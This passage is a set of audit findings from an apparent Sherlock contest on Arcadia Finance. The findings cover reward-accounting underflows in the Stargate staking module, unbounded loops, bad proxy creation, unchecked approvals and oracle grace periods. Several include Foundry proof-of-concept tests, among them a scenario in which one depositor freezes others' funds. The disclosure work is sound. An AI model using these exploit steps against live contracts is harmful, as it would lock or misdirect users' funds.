            positionState_.lastRewardPosition =
                SafeCastLib.safeCastTo128(positionState_.lastRewardPosition + deltaReward);
        }
        // Update the RewardPerToken of the position.
        positionState_.lastRewardPerTokenPosition = assetState_.lastRewardPerTokenGlobal;

        return (assetState_, positionState_);
    }

In order to get the actual rewards, the function uses _getCurrentReward, which is supposed to be overridden by the contract inheriting from AbstractStakingAM.

One such class is StakedStargateAM

function _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {
        currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
    }

The function makes an external call to Stargate’s LPStakingTime.sol#pendingEmissionToken

function pendingEmissionToken(uint256 _pid, address _user) external view returns (uint256) {
        PoolInfo storage pool = poolInfo[_pid];
        UserInfo storage user = userInfo[_pid][_user];
        uint256 accEmissionPerShare = pool.accEmissionPerShare;
        uint256 lpSupply = pool.lpToken.balanceOf(address(this));
        if (block.timestamp > pool.lastRewardTime && lpSupply != 0 && totalAllocPoint > 0) {
            uint256 multiplier = getMultiplier(pool.lastRewardTime, block.timestamp);
            uint256 tokenReward = multiplier.mul(eTokenPerSecond).mul(pool.allocPoint).div(totalAllocPoint);
            accEmissionPerShare = accEmissionPerShare.add(tokenReward.mul(1e12).div(lpSupply));
        }
        return user.amount.mul(accEmissionPerShare).div(1e12).sub(user.rewardDebt);
    }

The protocol assumes that pendingEmissionToken will always return a larger value each time it is called, i.e. that the returned number increases monotonically over time.

Because of this assumption, the protocol manually calculates the increase in rewards.

            // Calculate the increase in rewards since last Asset interaction.
            uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal;

Taking another look at pendingEmissionToken

function pendingEmissionToken(uint256 _pid, address _user) external view returns (uint256) {
        PoolInfo storage pool = poolInfo[_pid];
        UserInfo storage user = userInfo[_pid][_user];
        uint256 accEmissionPerShare = pool.accEmissionPerShare;
        uint256 lpSupply = pool.lpToken.balanceOf(address(this));
        if (block.timestamp > pool.lastRewardTime && lpSupply != 0 && totalAllocPoint > 0) {
            uint256 multiplier = getMultiplier(pool.lastRewardTime, block.timestamp);
            uint256 tokenReward = multiplier.mul(eTokenPerSecond).mul(pool.allocPoint).div(totalAllocPoint);
            accEmissionPerShare = accEmissionPerShare.add(tokenReward.mul(1e12).div(lpSupply));
        }
        return user.amount.mul(accEmissionPerShare).div(1e12).sub(user.rewardDebt);
    }

You’ll notice what the function returns:

return user.amount.mul(accEmissionPerShare).div(1e12).sub(user.rewardDebt);

It takes the user.amount which is the amount that msg.sender (StakedStargateAM) has deposited, then it multiplies it by the accEmissionPerShare which is calculated above, divides by 1e12 and then subtracts user.rewardDebt

user.rewardDebt acts as a checkpoint in a way to track rewards.

user.rewardDebt is set when deposit and withdraw are called inside LPStakingTime

We’ll take a look at only deposit as the logic is mirrored inside withdraw

 function deposit(uint256 _pid, uint256 _amount) external {
        PoolInfo storage pool = poolInfo[_pid];
        UserInfo storage user = userInfo[_pid][msg.sender];
        updatePool(_pid);
        if (user.amount > 0) {
            uint256 pending = user.amount.mul(pool.accEmissionPerShare).div(1e12).sub(user.rewardDebt);
            safeTokenTransfer(msg.sender, pending);
        }
        pool.lpToken.safeTransferFrom(address(msg.sender), address(this), _amount);
        user.amount = user.amount.add(_amount);
        user.rewardDebt = user.amount.mul(pool.accEmissionPerShare).div(1e12);
        lpBalances[_pid] = lpBalances[_pid].add(_amount);
        emit Deposit(msg.sender, _pid, _amount);
    }

You’ll notice that user.rewardDebt is set to user.amount.mul(pool.accEmissionPerShare).div(1e12)

Going back to pendingEmissionToken you’ll see that the return basically just calculates the user’s new rewardDebt and then it subtracts his old rewardDebt

Stargate does this because, unlike most other staking contracts, Stargate transfers rewards on both deposits and withdrawals, so it calculates rewards this way.

This is the root of the problem: the function returns the "current pending" rewards, not the "total" rewards the protocol assumes it returns.

The example below is simplified to give an overview of the problem.
Example:

  1. Account1 stakes 1e18 tokens through StakedStargateAM
  2. assetState.lastRewardGlobal is 0 , as this is the first stake.
  3. 10 days pass and Account2 stakes 1e18
  4. Suppose pendingEmissionToken returns 100 at this point
  5. deltaReward will be 100, since 100 - 0 = 100, and lastRewardGlobal is updated to 100
  6. 5 days pass and Account3 attempts to stake 1e18 tokens
  7. pendingEmissionToken returns only 50, because the deposit in step 3 already claimed the rewards accrued up to then
  8. The next line reverts, as we attempt 50 - 100 and, since the value is a uint, the whole tx reverts.
  9. The whole contract is now frozen until pendingEmissionToken returns a value > 100. All funds are stuck; no depositing/withdrawing or claiming of rewards can be done, since all three of these functions use _getRewardBalances

Because of the above, rewards will also be calculated incorrectly; a second PoC demonstrating this is attached.

Impact

Affected functions are:

  • mint
  • increaseLiquidity
  • decreaseLiquidity
  • claimReward
  • rewardOf

No depositing/withdrawing/claiming of rewards can be done. The bigger the gap between lastRewardGlobal and the current pending rewards, the longer the DoS of the entire contract.

The second depositor can weaponize this and deposit after 30 days for example, to completely freeze the first depositor’s assets for 30 days. (Again this can be more/less than 30, it's an example)

The issue will persist even after that and keep growing: each time lastRewardGlobal increases, the next DoS lasts longer.

For example, if lastRewardGlobal = 1e18, the functions only execute normally again once pendingEmissionToken returns > 1e18, at which point lastRewardGlobal becomes even bigger and the next DoS even longer.

Rewards will also be incorrectly calculated, as showcased by the second PoC.

Proof of Concept

To clearly see what is happening I recommend adding 2 console.logs after _getCurrentReward like so.

function _getRewardBalances(AssetState memory assetState_, PositionState memory positionState_)
        internal
        view
        returns (AssetState memory, PositionState memory)
    {   
        if (assetState_.totalStaked > 0) {
            // Calculate the new assetState
            // Fetch the current reward balance from the staking contract.
            uint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);
->          console.log("Current reward global: ", currentRewardGlobal);
->          console.log("Last reward global: ", assetState_.lastRewardGlobal);
            // Calculate the increase in rewards since last Asset interaction.
            uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal;
            uint256 deltaRewardPerToken = deltaReward.mulDivDown(1e18, assetState_.totalStaked);
            // Calculate and update the new RewardPerToken of the asset.
            // unchecked: RewardPerToken can overflow, what matters is the delta in RewardPerToken between two interactions.
            unchecked {
                assetState_.lastRewardPerTokenGlobal =
                    assetState_.lastRewardPerTokenGlobal + SafeCastLib.safeCastTo128(deltaRewardPerToken);
            }
            // Update the reward balance of the asset.
            assetState_.lastRewardGlobal = SafeCastLib.safeCastTo128(currentRewardGlobal);

            // Calculate the new positionState.
            // Calculate the difference in rewardPerToken since the last position interaction.
            // unchecked: RewardPerToken can underflow, what matters is the delta in RewardPerToken between two interactions.
            unchecked {
                deltaRewardPerToken = assetState_.lastRewardPerTokenGlobal - positionState_.lastRewardPerTokenPosition;
            }
            // Calculate the rewards earned by the position since its last interaction.
            // unchecked: deltaRewardPerToken and positionState_.amountStaked are smaller than type(uint128).max.
            unchecked {
                deltaReward = deltaRewardPerToken * positionState_.amountStaked / 1e18;
            }
            // Update the reward balance of the position.
            positionState_.lastRewardPosition =
                SafeCastLib.safeCastTo128(positionState_.lastRewardPosition + deltaReward);
        }
        // Update the RewardPerToken of the position.
        positionState_.lastRewardPerTokenPosition = assetState_.lastRewardPerTokenGlobal;

        return (assetState_, positionState_);
    }

Paste the following inside USDbCPool.fork.t.sol and run forge test --mt test_getRewardBalancesBreaksForStargate -vvvv

function test_getRewardBalancesBreaksForStargate() public {
        // Amount of underlying assets deposited in Stargate pool.
        uint256 amount1 = 1_000_000 * 10 ** USDbC.decimals();
        uint256 amount2 = 123_456 * 10 ** USDbC.decimals();

        // 2 users deploy a new Arcadia Account.
        address payable user1 = createUser("user1");
        address payable user2 = createUser("user2");

        vm.prank(user1);
        address arcadiaAccount1 = factory.createAccount(100, 0, address(0));

        vm.prank(user2);
        address arcadiaAccount2 = factory.createAccount(101, 0, address(0));

        // Stake Stargate Pool LP tokens in the Asset Modules and deposit minted ERC721 in Accounts.
        uint256 lpBalance1 = stakeInAssetModuleAndDepositInAccount(user1, arcadiaAccount1, USDbC, amount1, pid, pool);
        // 30 days pass and arcadiaAccount2 stakes as well
        vm.warp(block.timestamp + 30 days);
        uint256 lpBalance2 = stakeInAssetModuleAndDepositInAccount(user2, arcadiaAccount2, USDbC, amount2, pid, pool);

        // 20 days pass and account1 wants to decrease his liquidity
        vm.warp(block.timestamp + 20 days);

        vm.startPrank(arcadiaAccount1);
        // The tx reverts with an underflow
        vm.expectRevert();
        // The amount is irrelevant as we don't even reach that part of the code
        stakedStargateAM.decreaseLiquidity(1, 100);

        // The type of function doesn't matter as they all call _getRewardBalances
        vm.expectRevert();
        stakedStargateAM.burn(1);
        vm.stopPrank();
     }

PoC showcasing incorrect reward distribution.

function test_IncorrectHandlingOfRewards() public {
        uint256 initBalance = 1000 * 10 ** USDbC.decimals();
        assert(ERC20(address(pool)).balanceOf(users.accountOwner) == 0);

        // Given : A user deposits in the Stargate USDbC pool, in exchange of an LP token.
        vm.startPrank(users.accountOwner);
        deal(address(USDbC), users.accountOwner, initBalance);

        USDbC.approve(address(router), initBalance);
        router.addLiquidity(poolId, initBalance, users.accountOwner);

        // And : The user stakes the LP token via the StargateAssetModule
        uint256 stakedAmountFirst = ERC20(address(pool)).balanceOf(users.accountOwner);
        console.log(stakedAmountFirst);
        ERC20(address(pool)).approve(address(stakedStargateAM), stakedAmountFirst);
        uint256 tokenId = stakedStargateAM.mint(address(pool), uint128(stakedAmountFirst));

        vm.warp(block.timestamp + 50 days);

        deal(address(USDbC), users.accountOwner, initBalance * 2);
        USDbC.approve(address(router), initBalance * 2);
        router.addLiquidity(poolId, initBalance * 2, users.accountOwner);

        uint256 stakedAmountSecond = ERC20(address(pool)).balanceOf(users.accountOwner) - stakedAmountFirst;
        console.log( ERC20(address(pool)).balanceOf(users.accountOwner));
        ERC20(address(pool)).approve(address(stakedStargateAM), stakedAmountSecond);
        stakedStargateAM.increaseLiquidity(tokenId, uint128(stakedAmountSecond));


        vm.warp(block.timestamp + 100 days);
        stakedStargateAM.claimReward(tokenId);

        ERC20 rewardToken = stakedStargateAM.REWARD_TOKEN();
        assertEq(rewardToken.balanceOf(address(stakedStargateAM)), 0);

        vm.stopPrank();
    }

Code Snippet

https://github.com/arcadia-finance/accounts-v2/blob/9b24083cb832a41fce609a94c9146e03a77330b4/src/asset-modules/abstracts/AbstractStakingAM.sol#L539

Tool used

Manual Review
Foundry

Recommendation

Since AbstractStakingAM is used as a base class, I recommend making _getRewardBalances virtual so that each implementation can override it (a minimal sketch follows below).
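A minimal sketch of the suggested change, using the signature from the snippet above; only the virtual keyword (plus a matching override in the integration) is new:

// In AbstractStakingAM: allow integrations to override the reward accounting.
function _getRewardBalances(AssetState memory assetState_, PositionState memory positionState_)
    internal
    view
    virtual
    returns (AssetState memory, PositionState memory)
{
    // ...existing implementation shown above...
}

// In StakedStargateAM (or another integration with claim-on-deposit semantics):
// function _getRewardBalances(...) internal view override returns (...) { ... }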

Duplicate of #38

joshuajee - Unbounded loop in the smart contract can lead to DOS in some functions.

joshuajee

medium

Unbounded loop in the smart contract can lead to DOS in some functions.

Summary

The tranches array can grow without bound; this can cause the block gas limit to be exceeded, making transactions revert in the _syncInterestsToLiquidityProviders and _processDefault functions that loop over this array.

Vulnerability Detail

The _syncInterestsToLiquidityProviders and _processDefault functions loop over the tranches array. If this array grows above a certain size, any function calling either of these internal functions will experience a DoS.

Impact

The following functions become inoperable when this happens: _syncInterestsToLiquidityProviders, _processDefault, settleLiquidationUnhappyFlow, _syncInterests, liquidityOfAndSync, and processInterests.
Every function using the processInterests modifier would be affected, e.g. setInterestWeightTranche, setTreasuryWeights, addTranche, depositInLendingPool, etc.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L754
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L1065

POC

The transaction cost of donateToTranche increases sharply when going from 100 to 200 tranches; this could lead to a DoS of the system and higher gas costs for users.

 
    function testFuzz_poc_tranche_dos(uint256 vas) public {

        vm.startPrank(users.creatorAddress);
   
        for (uint i = 0; i < 100; i++) {
            pool.addTranche(address(new TrancheExtension(address(pool), vas, "Tranche", "T")), 10);
        }

        vm.stopPrank();
  
        vm.startPrank(users.liquidityProvider);

        vm.txGasPrice(2);
        pool.donateToTranche(0, 1 ether);
        console.log("Gas Usage After 100 Tranch", gasleft());

        vm.stopPrank();

        vm.startPrank(users.creatorAddress);
   
        for (uint i = 0; i < 100; i++) {
            pool.addTranche(address(new TrancheExtension(address(pool), vas, "Tranche", "T")), 10);
        }

        vm.stopPrank();
  
        vm.startPrank(users.liquidityProvider);

       
        vm.txGasPrice(2);
        pool.donateToTranche(0, 1 ether);
        console2.log("Gas Usage After 200 Tranch", gasleft());

        vm.stopPrank();

    }

Tool used

Manual Review

Recommendation

Avoid looping over unbounded arrays; add a check that prevents the tranches array from growing beyond a fixed maximum (see the sketch below).
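A fragment-level sketch of such a cap in LendingPool.addTranche, not Arcadia code; the MAX_TRANCHES value, the simplified signature, and the revert reason are illustrative assumptions:

uint256 internal constant MAX_TRANCHES = 16;

function addTranche(address tranche, uint16 interestWeight_) external /* onlyOwner processInterests */ {
    // New: hard cap the number of tranches that the interest/default loops iterate over.
    if (tranches.length >= MAX_TRANCHES) revert("max tranches reached");
    // ...existing addTranche logic (weights, approvals, tranches.push)...
}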

jesjupyer - User could create a nonsense `proxy` before `versionInformation` is ever set

jesjupyer

medium

User could create a nonsense proxy before versionInformation is ever set

Summary

The check in Factory::createAccount uses the newest version when accountVersion == 0. However, there is no check that latestAccountVersion is not 0, which is the case as long as no versionInformation has ever been set. Because of this, a user can call Factory::createAccount without reverting before Factory::setNewAccountInfo has ever been called. The returned proxy will delegate to address(0) and is useless, yet the NFT is still minted and the proxy is still counted as a valid account.

Vulnerability Detail

In Factory::createAccount, a user can set accountVersion to 0 to use the latestAccountVersion.

        accountVersion = accountVersion == 0 ? latestAccountVersion : accountVersion;

        if (accountVersion > latestAccountVersion) revert FactoryErrors.InvalidAccountVersion();
        if (accountVersionBlocked[accountVersion]) revert FactoryErrors.AccountVersionBlocked();

The accountVersion should not exceed latestAccountVersion and should not be blocked.

However, as long as Factory::setNewAccountInfo has not been called, latestAccountVersion remains 0. If accountVersion == 0, then accountVersion == latestAccountVersion and accountVersionBlocked[0] == false, so the checks are bypassed.

Since versionInformation[accountVersion].implementation is address(0) when no value has been set, the created Proxy stores address(0) in IMPLEMENTATION_SLOT and delegates to it. Such a proxy is useless.

    constructor(address implementation) payable {
        _getAddressSlot(IMPLEMENTATION_SLOT).value = implementation;
        emit Upgraded(implementation);
    }

Since the call to AccountV1::initialize on such a proxy does not revert (a delegatecall to address(0) succeeds) and the function has no return value that is checked, the code will not revert. The NFT will be minted and the account will be recognized as valid.

        allAccounts.push(account);
        accountIndex[account] = allAccounts.length; // What about accountIndex = 0?

        _mint(msg.sender, allAccounts.length);

        IAccount(account).initialize(msg.sender, versionInformation[accountVersion].registry, creditor);

We have a PoC here:

Comment out factory.setNewAccountInfo(address(registryExtension), address(accountV1Logic), Constants.upgradeProof1To2, ""); in the setUp() function.

    function test_createAccountWithoutAccount() public {
        console2.log("current latestAccountVersion", factory.latestAccountVersion());
        assertEq(factory.latestAccountVersion(),0);
        address proxyAddress = factory.createAccount(0, 0, address(0));
        console2.log("proxyAddress ", proxyAddress);
        AccountV1 proxyAccount = AccountV1(proxyAddress);
        assertEq(factory.allAccountsLength(),1);  // nft will still be minted
        proxyAccount.setNumeraire(address(this)); // Delegate Call on EOA won't revert
        factory.createAccount(1, 0, address(0));
        assertEq(factory.allAccountsLength(),2);
    }

The result (screenshot omitted) confirms the behavior described above.

Impact

The current check is flawed and can be bypassed when no versionInformation has been set: a Proxy delegating to address(0) will be created. Even though it is useless and should not be valid, the NFT will still be minted and it will still be counted as a valid account.

Code Snippet

Factory::createAccount

    function createAccount(uint256 salt, uint256 accountVersion, address creditor)
        external
        whenCreateNotPaused
        returns (address account)
    {
        accountVersion = accountVersion == 0 ? latestAccountVersion : accountVersion;

        if (accountVersion > latestAccountVersion) revert FactoryErrors.InvalidAccountVersion();
        if (accountVersionBlocked[accountVersion]) revert FactoryErrors.AccountVersionBlocked();

        // Hash tx.origin with the user-provided salt to avoid front-running Account deployment with an identical salt.
        // We use tx.origin instead of msg.sender so that deployments through a third party contract are not vulnerable to front-running.
        account = address(
            new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(
                versionInformation[accountVersion].implementation
            )
        );

        allAccounts.push(account);
        accountIndex[account] = allAccounts.length;

        _mint(msg.sender, allAccounts.length);

        IAccount(account).initialize(msg.sender, versionInformation[accountVersion].registry, creditor);

        // unsafe cast: accountVersion <= latestAccountVersion, which is a uint88.
        emit AccountUpgraded(account, uint88(accountVersion));
    }

Proxy::constructor

    constructor(address implementation) payable {
        _getAddressSlot(IMPLEMENTATION_SLOT).value = implementation;
        emit Upgraded(implementation);
    }

Tool used

Foundry

Manual Review

Recommendation

A few ways to mitigate the issue.

  1. Add a check to ensure that latestAccountVersion is not 0 (a sketch follows after this list).
  2. Block version 0 by default.
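A sketch of option 1, inserted at the top of Factory::createAccount as quoted above; it only adds the accountVersion == 0 check and reuses the existing FactoryErrors.InvalidAccountVersion error:

accountVersion = accountVersion == 0 ? latestAccountVersion : accountVersion;

// New: reject creation while no Account implementation has been registered yet.
if (accountVersion == 0) revert FactoryErrors.InvalidAccountVersion();

if (accountVersion > latestAccountVersion) revert FactoryErrors.InvalidAccountVersion();
if (accountVersionBlocked[accountVersion]) revert FactoryErrors.AccountVersionBlocked();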

AgileJune - StakedStargateAM.sol: the approve() return value is not checked

AgileJune

medium

StakedStargateAM.sol: the approve() return value is not checked

Summary

The return value of approve() is not checked in _stake().

Vulnerability Detail

Not all IERC20 implementations revert when there's a failure in approve.
Some ERC-20 tokens, such as USDC (USD Coin), are known to exhibit behavior where the approve function does not revert on failure.
The function signature has a boolean return value, and such tokens indicate errors that way instead.

Impact

By not checking the return value, operations that should have been marked as failed may go through without actually approving anything.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/asset-modules/Stargate-Finance/StakedStargateAM.sol#L83

Tool used

Manual Review

Recommendation

Check the return value and revert if it is false, for example by using a safe-approve helper (see the sketch below).
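A diff-style sketch using solmate's SafeTransferLib.safeApprove, which reverts when the token returns false; the import path is illustrative and whether StakedStargateAM already imports the library is an assumption:

+   import { SafeTransferLib } from "../../../lib/solmate/src/utils/SafeTransferLib.sol";

    function _stake(address asset, uint256 amount) internal override {
-       ERC20(asset).approve(address(LP_STAKING_TIME), amount);
+       // Reverts if the token returns false (or returns no data from a non-contract).
+       SafeTransferLib.safeApprove(ERC20(asset), address(LP_STAKING_TIME), amount);

        LP_STAKING_TIME.deposit(assetToPid[asset], amount);
    }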

n1punp - When the `gracePeriod` is small (< 1 year), the registry's sequencer uptime oracle will report incorrectly.

n1punp

high

When the gracePeriod is small (< 1 year), the registry's sequencer uptime oracle will report incorrectly.

Summary

When the gracePeriod is small (< 1 year), the registry's sequencer uptime oracle will report incorrectly.

Vulnerability Detail

Per the documentation, the Registry's sequencer gracePeriod is the grace period after the sequencer is back up. If we look at the code, the Registry treats the sequencer as "down" if the sequencer uptime oracle either:

  1. reports answer = 1 -- representing the "down" status, or
  2. the latest status update is more recent than the defined grace period ( block.timestamp - startedAt < riskParams[creditor].gracePeriod )

However, if we look on-chain, we see that this uptime feed does not have a guaranteed "heartbeat" duration. This means the status only gets updated when the sequencer's status changes (from down to up, or up to down). For a specific example, we can look at the 3 most recent rounds of Arbitrum's sequencer uptime feed oracle ( https://arbiscan.io/address/0xFdB631F5EE196F0ed6FAa767959853A9F217697D#readContract ). At the time of writing, here is the data:

  • Round 18446744073709551649: answer=0 , startedAt=1668705995 (Nov 17, 2022 -- ~1 year ago+)
  • Round 18446744073709551650: answer=1 , startedAt=1703701247 (Dec 27, 2023 -- ~a month ago+)
  • Round 18446744073709551651: answer=0 , startedAt=1703701283 (Dec 27 2023 -- ~a month ago+)

As we can see, the duration between updates can range from months to more than a year. So, if the grace period is not sufficiently large, the Registry will simply treat the sequencer as down while it should be considered up, and it will therefore function incorrectly.

Impact

The Registry will treat the sequencer as down most of the time if the gracePeriod is defined as less than roughly a year, as suggested by the on-chain evidence. Even if it is defined large enough today, it may no longer be large enough as more time passes while the sequencer keeps functioning properly.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/Registry.sol#L174-L176

Tool used

Manual Review

Recommendation

  • Define the grace period to be large enough (perhaps the maximum possible), or simply remove the staleness check (grace period) for the sequencer uptime oracle altogether.

rvierdiiev - No ability to withdraw from Stargate LPStaking in case of emergency

rvierdiiev

medium

No ability to withdraw from Stargate LPStaking in case of emergency

Summary

There is no ability to withdraw from Stargate LPStaking in case of emergency, as emergencyWithdraw is not integrated.

Vulnerability Detail

Users can wrap their Stargate LP tokens into the AbstractStakingAM contract to use them as collateral in their accounts.

The Stargate LPStaking contract has an emergencyWithdraw function that allows withdrawing LP tokens from the contract in case of emergency. In this case no rewards are claimed; the LP tokens are simply transferred out.

But AbstractStakingAM does not integrate that function, which puts users' LP tokens at risk.

Impact

No ability to withdraw from Stargate in case of emergency.

Code Snippet

Provided above

Tool used

Manual Review

Recommendation

Implement an emergencyWithdraw integration (a sketch follows below).
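A sketch of what such an integration could look like in StakedStargateAM, not Arcadia code. It assumes LP_STAKING_TIME exposes a MasterChef-style emergencyWithdraw(uint256 pid) and that the interface is extended accordingly; the onlyOwner access control and the follow-up accounting for the recovered LP tokens are illustrative and intentionally omitted:

function emergencyWithdrawFromStaking(address asset) external onlyOwner {
    // Pulls the LP tokens back into this Asset Module, forfeiting pending rewards.
    LP_STAKING_TIME.emergencyWithdraw(assetToPid[asset]);
    // Position owners would subsequently need a path to withdraw their
    // pro-rata share of the recovered LP tokens.
}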

Duplicate of #172

jesjupyer - Error is not properly handled when a user creates a `Proxy` via the `Factory` with the same salt twice

jesjupyer

medium

Error is not properly handled when a user creates a Proxy via the Factory with the same salt twice

Summary

The salt a user passes to createAccount when creating a Proxy is neither stored nor flagged, and there is no dedicated error handling for reuse. Thus, if the user calls createAccount with the same salt a second time, the transaction reverts unexpectedly and the user has no idea what happened.

Vulnerability Detail

In the function Factory::createAccount, the salt is used to create Proxy.

        account = address(
            new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(
                versionInformation[accountVersion].implementation
            )
        );

However, the salt is neither stored nor flagged for the current user, so the user may call Factory::createAccount twice with the same salt.

The contract does not handle this case. When the same user reuses a salt, the transaction reverts unexpectedly without a specific reason being given.

The POC is below:

    function test_doubleDeploy() public {
        address proxyAddress = factory.createAccount(0, 0, address(0));
        console2.log("proxyAddress ", proxyAddress);
        vm.expectRevert();
        address proxyAddress2 = factory.createAccount(0, 0, address(0));
    }

and the output shows the call simply reverting with no specific reason given (screenshot omitted).

Impact

When a user reuses a salt, the transaction unexpectedly reverts with no specific reason given, as this scenario is never properly handled.

Code Snippet

Factory::createAccount

    function createAccount(uint256 salt, uint256 accountVersion, address creditor)
        external
        whenCreateNotPaused
        returns (address account)
    {
        accountVersion = accountVersion == 0 ? latestAccountVersion : accountVersion;

        if (accountVersion > latestAccountVersion) revert FactoryErrors.InvalidAccountVersion();
        if (accountVersionBlocked[accountVersion]) revert FactoryErrors.AccountVersionBlocked();
        

        // Hash tx.origin with the user-provided salt to avoid front-running Account deployment with an identical salt.
        // We use tx.origin instead of msg.sender so that deployments through a third party contract are not vulnerable to front-running.
        account = address(
            new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(
                versionInformation[accountVersion].implementation
            )
        );
        ...
    }

Tool used

Manual Review, Foundry

Recommendation

  1. Use a mapping to store whether tx.origin + salt has already been used.

  2. Use try-catch to handle this case and revert with a clear reason, for example:

        try new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(
            versionInformation[accountVersion].implementation
        ) returns (Proxy proxy_) {
            account = address(proxy_);
        } catch {
            revert("Used Salt");
        }

0xrice.cooker - Wrong logic in StakedStargateAM._getCurrentReward() leads to DoS in AbstractStakingAM._getRewardBalances()

0xrice.cooker

medium

Wrong logic in StakedStargateAM._getCurrentReward() leads to DoS in AbstractStakingAM._getRewardBalances()

Summary

Wrong logic in StakedStargateAM._getCurrentReward() leads to DoS in AbstractStakingAM._getRewardBalances().

Vulnerability Detail

DISCLAIMER: this issue is not a duplicate of the HIGH bug about LP_STAKING_TIME.deposit() and LP_STAKING_TIME.withdraw() sending the rewards directly to the StakedStargateAM contract.

Root cause: _getCurrentReward() returns the reward that CAN currently be claimed, when it should return the total reward, i.e. both the already claimed and the still claimable part.

As the sponsor's comment about _getCurrentReward() states:

Returns the amount of reward tokens that can be claimed BY THIS CONTRACT for a specific asset.

This means that when we claim the reward, _getCurrentReward() resets to 0. But it should not reset to 0; it should accumulate the yield rewards over time and NEVER decrease. Otherwise, AbstractStakingAM._getRewardBalances() will be DoSed at this line:

    function _getRewardBalances(AssetState memory assetState_, PositionState memory positionState_)
        internal
        view
        returns (AssetState memory, PositionState memory)
    {
        if (assetState_.totalStaked > 0) {

            uint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);

            uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal;// <<<@DOS here
            uint256 deltaRewardPerToken = deltaReward.mulDivDown(1e18, assetState_.totalStaked);

            unchecked {
                assetState_.lastRewardPerTokenGlobal =
                    assetState_.lastRewardPerTokenGlobal + SafeCastLib.safeCastTo128(deltaRewardPerToken);
            }


            assetState_.lastRewardGlobal = SafeCastLib.safeCastTo128(currentRewardGlobal);

The reason it gets DoSed is that assetState_.lastRewardGlobal stores the reward value observed at the last interaction. Because _getCurrentReward() resets to 0 every time rewards are claimed, we have to wait longer than the previous interval for _getCurrentReward(positionState_.asset) to exceed assetState_.lastRewardGlobal again.

Impact

Affected (DoSed) functions (functions that call AbstractStakingAM._getRewardBalances()):
+ AbstractStakingAM.mint()
+ AbstractStakingAM.increaseLiquidity()
+ AbstractStakingAM.decreaseLiquidity()
+ AbstractStakingAM.claimReward()
+ AbstractStakingAM.getRiskFactors()

Code Snippet

Tool used

Manual Review

Recommendation

The fix:

+   mapping(uint256 => uint256) pidToReward;

    function _stake(address asset, uint256 amount) internal override {
        ERC20(asset).approve(address(LP_STAKING_TIME), amount);

        LP_STAKING_TIME.deposit(assetToPid[asset], amount);
    }

    function _withdraw(address asset, uint256 amount) internal override {
        LP_STAKING_TIME.withdraw(assetToPid[asset], amount);
    }

    function _claimReward(address asset) internal override {
+  	pidToReward[assetToPid[asset]] += LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));

        LP_STAKING_TIME.withdraw(assetToPid[asset], 0);
    }

    function _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {
    
-       currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
+       currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this)) + pidToReward[assetToPid[asset]];
    }

Combined with the fix for the HIGH low-hanging bug:

+   mapping(uint256 => uint256) pidToReward;

    function _stake(address asset, uint256 amount) internal override {
+  	pidToReward[assetToPid[asset]] += LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
        ERC20(asset).approve(address(LP_STAKING_TIME), amount);

        LP_STAKING_TIME.deposit(assetToPid[asset], amount);
    }

    function _withdraw(address asset, uint256 amount) internal override {
+  	pidToReward[assetToPid[asset]] += LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));

        LP_STAKING_TIME.withdraw(assetToPid[asset], amount);
    }

    function _claimReward(address asset) internal override {
+  	pidToReward[assetToPid[asset]] += LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));

        LP_STAKING_TIME.withdraw(assetToPid[asset], 0);
    }

    function _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {
    
-        currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
+        currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this)) + pidToReward[assetToPid[asset]];
    }

Duplicate of #38

rvierdiiev - assetState_.lastRewardGlobal is not cleared during deposit

rvierdiiev

high

assetState_.lastRewardGlobal is not cleared during deposit

Summary

When a new deposit is made into Stargate, all earned rewards are sent to the caller. Because assetState_.lastRewardGlobal is not reset to 0, as is done for the other functions that change the staked balance, the rewards distribution becomes incorrect and broken.

Vulnerability Detail

Users can claim rewards using the burn, decreaseLiquidity and claimReward functions. All of them then set assetState_.lastRewardGlobal to 0. This variable tracks the increase of earned rewards for the contract between reward claims, so once rewards are claimed it should be cleared.

The AbstractStakingAM contract incorrectly assumes that only withdrawing from LP_STAKING_TIME claims rewards. This is not true: when a deposit occurs, rewards are claimed as well.

When a user deposits into AbstractStakingAM, the rewards are claimed but assetState_.lastRewardGlobal is not set to 0. As a result, the rewards distribution becomes incorrect. For some time the _getRewardBalances function will also revert because of an underflow, as _getCurrentReward will likely return a smaller value than assetState_.lastRewardGlobal; after some time the function will start working again.

Impact

Rewards accounting is corrupted, and the contract can be DoSed for some time.

Code Snippet

Provided above

Tool used

Manual Review

Recommendation

Since a deposit also claims rewards, clear the assetState_.lastRewardGlobal variable on deposit as well.

Duplicate of #38

jesjupyer - Lack of `checkOracleSequence` call in function `Registry::getRateInUsd`

jesjupyer

medium

Lack of checkOracleSequence call in function Registry::getRateInUsd

Summary

The checkOracleSequence ensures that the oracle sequence should comply with sets of criteria(For example, properly added oracle, consecutive order, last Asset being USD). However, in Registry::getRateInUsd, oracleSequence is being directly unpacked and used without calling checkOracleSequence. Thus, the input oracle may not be registered, the sequence may not be valid, and even the last asset may not be USD, all leading to an incorrect return value of rate.

Vulnerability Detail

